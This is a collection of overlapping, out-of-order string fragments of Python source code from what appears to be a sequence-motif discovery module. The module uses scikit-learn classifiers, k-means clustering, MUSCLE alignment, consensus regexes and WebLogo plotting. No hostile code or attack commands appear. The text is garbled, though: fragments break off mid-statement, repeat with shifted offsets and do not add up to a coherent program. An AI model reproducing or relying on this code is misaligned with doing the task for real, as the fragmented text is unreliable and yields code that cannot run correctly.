"from scipy.cluster.hierarchy import linkage import regex as re from collections import Counter from",
"seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin) / 2) cluster_ids = set(cluster_ids) for i",
"seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs",
"figname = None plt.show() plt.close() return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs =",
"def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms",
"cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = '#### Motif",
"y_axis_tic_spacing options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint: options.fineprint",
"= os.getcwd() url = pwd + '/' + fname txt = [] if",
"if x_label: options.xaxis_label = x_label options.show_yaxis = show_y_axis if y_label: options.yaxis_label = y_label",
"def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id in",
"neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size,",
"import Alphabet, SeqList import weblogolib as wbl from scipy.cluster.hierarchy import linkage import regex",
"def _seq_to_stdin_fasta(self, seqs): # seperating headers headers, instances = [list(x) for x in",
"in seqs_summary[seq_id]] centers = defaultdict(list) for begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin +",
"if std_th is None or std <= std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives)",
"quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id in motives:",
"min_score and len(align_seqs) > min_cluster_size: return True else: return False def compute_motif(self, seqs=None,",
"= sig[:median_len] else: if len(sig) >= median_len: sigs = sigs + sig[:median_len] sig",
"txt.append('<p align=\"left\"><img src=\"file://' + url + '\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname",
"median_len: sigs = sig[:median_len] else: if len(sig) >= median_len: sigs = sigs +",
"i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() l = letter_regex(k,",
"color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line",
"% \\ (cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info) if len(ds): figname = plot_distance(",
"motives: if ids is None: ids = [cluster_id for cluster_id in motives] logos",
"Reason: %s' % e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3): sep = '",
"> 0: seqs = [s for h, s in clusters[cluster_id]] seq = sep.join(seqs)",
"max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: components = self._decompose_header(header) orig_header, score,",
"= self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname) for logo_txt in logo_txts:",
"n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances'",
"= sigmoid(value, self.a, self.b) p_val = 1 - y return p_val def compute_clusters(self,",
"cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single') orders = [] for id1, id2 in",
"clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs and compute their gram",
"!= median_len: logger.debug('Length mismatch: %d != %d' % (len(sig), median_len)) if sigs is",
"cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return",
"+ str(begin) + ':' new_header += str(end) + '<loc>' subsequences.append((new_header, subseq)) if not",
"data_matrix = vectorizer.transform(iterable) return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while",
"data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while True: items = []",
"== '>': if seq: yield seq seq = \"\" line_str = str(line) yield",
"zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs =",
"motives else: logger.debug('After quality filter, %d motives' % len(_motives)) return _motives def select_motives(self,",
"if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size) else: sample_seqs = seqs align_seqs",
"1 trimmed_align_seqs = [] for h, align_seq in align_seqs: trimmed_align_seq = [a for",
"freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts avg, std =",
"pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool()",
"motif_seqs = [''] * len(headers) for i in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1])",
"matches = re.findall(needle, s, overlapped=True) if len(matches): yield 1 else: yield 0 def",
"txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100) else: logger.warning( 'No motives to report. Try",
"\"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 - y return p_val",
"= [] for cluster_id in clusters: if len(clusters[cluster_id]) > 0: seqs = [s",
"\"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error: No clusters.') mcs = min_cluster_size logger.debug('Alignment') motives",
"it = iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time",
"= None plt.show() plt.close() return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix",
"\"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else: pool",
"try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return",
"plt.show() plt.close() return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable)",
"(time.time() - start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items = [] for i, p",
"e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None):",
"align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and",
"False: break # TODO: run the predictor to learn the new class definition",
"nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100) else: logger.warning( 'No motives",
"len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq':",
"logger.debug('Fitting') start_time = time.time() for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time =",
"'<subseq>%s<subseq>' % (subseq_seq) subseq = (header, seq) subseqs.append(subseq) subarrays_items += subseqs return subarrays_items",
"30) else: avg_loc = -1 std_loc = 0 return avg_loc, std_loc def hits(motives,",
"% len(motives)) return motives def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives =",
"units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info = ' - num",
"mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for",
"align=\"left\"><img src=\"file://' + url + '\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname +",
"sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = '#### Motif id: %d'",
"distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches = plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3)",
"max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: yield self._decompose_header(header) except Exception as",
"align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score = 0 to_be_removed",
"dim = len(align_seqs) cluster = [] for h, align_seq in align_seqs: str_list =",
"regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs':",
"return preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs =",
"composition = 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False,",
"self._decompose_header(header) orig_header, score, begin, end, subseq = components p = self.compute_p_value(score) if p",
"end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start, end,",
"self.alphabet = IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating headers",
"locs.append(m) if locs: avg_loc = np.percentile(locs, 50) std_loc = np.percentile(locs, 70) - np.percentile(locs,",
"sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error: No clusters.') mcs = min_cluster_size logger.debug('Alignment')",
"% (i, size, d_time, d_loc_time)) pool.close() pool.join() preds = np.hstack(preds) binary_preds = np.hstack(binary_preds)",
"multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs == -1:",
"(len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y",
"cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close()",
"% (dtime)) self.clusters = defaultdict(list) for pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After",
"<= std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives) == 0: logger.warning('Quality filter is too",
"SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if self.output_format == 'png':",
"stderr = muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs",
"row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i,",
"pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:')",
"0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign = np.copy(sig) sign[sign >= 0] = 0",
"extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts,",
"= multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except",
"for h, s in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs",
"+ '\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\"></p>') return '\\n'.join(txt) def",
"Bio.Alphabet import IUPAC from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord from corebio.seq",
"self.clusterer_is_fit = False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self, obj):",
"import MuscleCommandline from Bio.Alphabet import IUPAC from Bio.Seq import Seq from Bio.SeqRecord import",
"def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits',",
"= motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2",
"for header, seq in subarrays_items: components = self._decompose_header(header) orig_header, score, begin, end, subseq",
"classes=classes) d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time size =",
"xs = np.sort(x) ys = np.arange(1, len(xs) + 1) / float(len(xs)) return xs,",
"= p.get() y = [1] * pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1]",
"= Counter(row) k = c.most_common() if k[0][0] == '-': to_be_removed.append(i) val = k[1][1]",
"0: logger.warning('Quality filter is too strict. Ignoring filter.') return motives else: logger.debug('After quality",
"1: code_str = code[0] else: code_str = '(' + '|'.join(code) + ')' return",
"ids is None: ids = [cluster_id for cluster_id in motives] logos = dict()",
"loc_start_time = time.time() pos_data_matrix = p.get() matrices += pos_data_matrix d_time = time.time() -",
"MuscleCommandline from Bio.Alphabet import IUPAC from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord",
"distances = defaultdict(list) size = max(id for id in motives) + 1 cooccurence_mtx",
"on: %d fragments' % len(subsequences)) n = multiprocessing.cpu_count() pos_block_size = len(subsequences) / n",
"min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error: No clusters.')",
"seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs and compute their gram matrix",
"motives = dict() for cluster_id in clusters: start_time = time.time() # align with",
"header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header, score, begin, end, subseq def decompose(self, seqs=None,",
"str(line) yield line_str.strip() else: line_str = line.split() if line_str: seq += str(line_str[0]).strip() if",
"secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------",
"y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix",
"plt import joblib from scipy.optimize import curve_fit import multiprocessing logger = logging.getLogger(__name__) def",
"itertools import izip import time from sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model import",
"%s' % motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if",
"vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer))",
"defaultdict(list) size = max(id for id in motives) + 1 cooccurence_mtx = np.zeros((size,",
"info = ' - num subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info = '",
"is_high_quality: info1 = 'Joining: %d (#%d), %d (#%d) score: %.2f' % \\ (i,",
"info1 = 'Joining: %d (#%d), %d (#%d) score: %.2f' % \\ (i, n_i,",
"y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\" options =",
"success = True if success is False: break # TODO: run the predictor",
"cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary))",
"n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while True: items = [] for i in",
"alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data,",
"= ' ' * (complexity * 2) # join all sequences in a",
"p.get() subarrays_items += subarrays_item d_time = time.time() - start_time d_loc_time = time.time() -",
"i in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i + 1] return",
"n_j, rel_nw_score) info2 = ' deleting: %d [%d is now #%d]' % \\",
"re.finditer(needle, s): s = match.start() e = match.end() m = s + (e",
"len(motif['seqs']) logo_txt.append(info) info = ' - consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info",
"j)] info = ' - num co-occurences %d %s vs %d %s: %d'",
"chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Performance evaluation') start_time =",
"= [] for (orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence(",
"y_binary)) # roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception as e: logger.debug('Failed",
"bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname def mean_shift_decomposition(sig,",
"options.ignore_lower_case = ignore_lower_case options.unit_name = units options.first_index = first_position if logo_range: options.logo_start =",
"np.percentile(locs, 70) - np.percentile(locs, 30) else: avg_loc = -1 std_loc = 0 return",
"learn the new class definition logger.debug('After merge, %d motives' % len(motives)) return motives",
"for line in lines: if line: if line[0] == '>': if seq: yield",
"figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ):",
"i, p in enumerate(results): loc_start_time = time.time() pos_data_matrix = p.get() matrices += pos_data_matrix",
"data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if self.output_format == 'png': return wbl.png_formatter(data,",
"tokens[0] begin, end = tokens[1].split(':') yield (seq_id, int(begin), int(end), i) def compute_cooccurence(motives, ids=None):",
"y += [-1] * neg_data_matrix.shape[0] y = np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix,",
"pool.close() pool.join() return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator)",
"min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error: No clusters.') mcs =",
"i, j in ms: if motives.get(i, None) and motives.get(j, None): n_i = len(motives[i]['seqs'])",
"wbl.png_formatter(data, format) elif self.output_format == 'png_print': return wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg':",
"logger.debug('ECDF fit on %d values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a,",
"options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution",
"str(line_str[0]).strip() if seq: yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to perform",
"y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion",
"in clusters: if len(clusters[cluster_id]) > 0: seqs = [s for h, s in",
"header new_header += '<loc>' + str(begin) + ':' new_header += str(end) + '<loc>'",
"for i in range(n): it = iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None,",
"in motives] logos = dict() for cluster_id in ids: logo_image, logo_txt = self.compute_logo(",
"header.split('<score>')[1] score = float(score) loc = header.split('<loc>')[1] begin, end = loc.split(':') begin =",
"True: items = [] for i in range(n): it = iterable.next() items.append(it) yield",
"with enough space that # kmers dont interfere cluster_seqs = [] for cluster_id",
"% (self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b) p_val",
"ds = distances[(cluster_id, j)] info = ' - num co-occurences %d %s vs",
"/ dim >= min_freq: score += 1 trimmed_align_seqs = [] for h, align_seq",
"logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception as e: logger.debug('Failed iteration. Reason: %s'",
"izip import time from sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier from",
"options.logo_end = logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars = error_bars if title: options.title =",
"= logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars = error_bars if title: options.title = title",
"[] for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() if",
"motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2 * nw_score / (len(seq_i)",
"- start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items = [] for i, p in",
"yield (h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs,",
"= [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f",
"def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if",
"\"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1):",
"their gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c",
"muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality:",
"% (fname, cluster_id) with open(imagename, 'wb') as f: f.write(logo) return imagename def _wrap_image(self,",
"import os from collections import defaultdict from eden import apply_async import numpy as",
"motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs, motives, freq_th=freq_th,",
"for i in motives], reverse=True): info = ' - %.2s %s' % \\",
"def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a = -4 self.b = 1",
"%.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable,",
"stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers) for i in range(len(out[:-1]))[::2]:",
"= np.array(sigs) / float(len(seqs)) return sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig =",
"np.zeros((size, size)) for seq_id in sorted(seqs_summary): cluster_ids = [cluster_id for begin, end, cluster_id",
"= max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start, end, width)) for",
"\"\"\"compute_logos.\"\"\" if motives: if ids is None: ids = [cluster_id for cluster_id in",
"gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single') orders = [] for",
"cluster_ids: cooccurence_mtx[i, j] += 1 if i != j: # find closest instance",
"= y_axis_tic_spacing options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint:",
"n_j) logger.debug(info1 + info2) # update motives motives[i] = motif del motives[j] success",
"subarrays_items = [] for i, p in enumerate(results): loc_start_time = time.time() subarrays_item =",
"sigs = sig[:median_len] else: if len(sig) >= median_len: sigs = sigs + sig[:median_len]",
"end = int(end) subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header, score, begin,",
"[] for h, s in haystack: for match in re.finditer(needle, s): s =",
"regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100) else:",
"neg_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup",
"= {'maxiters': 7} if self.diags is True: params['diags'] = True if self.maxhours is",
"h, align_seq in align_seqs: str_list = [c for c in align_seq] concat_str =",
"estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time size",
"pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size",
"(p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix = p.get() y =",
"return False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma =",
"#%d]' % \\ (j, i, n_i + n_j) logger.debug(info1 + info2) # update",
"neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception as e:",
"'%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None",
"7} if self.diags is True: params['diags'] = True if self.maxhours is not None:",
"overlapped=True) if len(matches): yield 1 else: yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts",
"% motif['consensus_seq'] logo_txt.append(info) info = ' - consensus regex: %s' % motif['regex_seq'] logo_txt.append(info)",
"in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs and compute their",
"if fname: plt.draw() figname = '%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0)",
"return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = [] for h, s in",
"\"fasta\") data = handle.getvalue() return headers, data def _perform_ma(self, data): params = {'maxiters':",
"if i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self, seqs,",
"compute their gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear')",
"regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 = 'Joining: %d (#%d), %d (#%d) score: %.2f'",
"motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info = ' - num occurrences of regex: %d'",
"std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std if freq_th is",
"format = wbl.LogoFormat(data, self.options) if self.output_format == 'png': return wbl.png_formatter(data, format) elif self.output_format",
"IUPAC from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord from corebio.seq import Alphabet,",
"iterable: new_header = header new_header += '<loc>' + str(begin) + ':' new_header +=",
"counts = sum(find_occurrences(needle, haystack)) size = len(haystack) return counts, float(counts) / size def",
"plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig(",
"row in enumerate(cluster.T): c = Counter(row) k = c.most_common() if k[0][0] == '-':",
"(cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives],",
"def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size = len(haystack) return counts,",
"= np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time() -",
"code = [] for letter, count in k: if count / float(size) >",
"ys = ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt",
"first_position if logo_range: options.logo_start = logo_range[0] options.logo_end = logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars",
"%.2f' % (fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info = '",
"sigmoid(value, self.a, self.b) p_val = 1 - y return p_val def ecdf(x): \"\"\"Empirical",
"* neg_data_matrix.shape[0] y = np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time",
"score(self, seqs=None): \"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield",
"multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm =",
"min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs,",
"'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags = diags self.maxiters = maxiters self.maxhours",
"in ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return",
"in haystack: for match in re.finditer(needle, s): s = match.start() e = match.end()",
"= sigmoid(value, self.a, self.b) p_val = 1 - y return p_val def ecdf(x):",
"_fasta_to_fasta(lines): seq = \"\" for line in lines: if line: if line[0] ==",
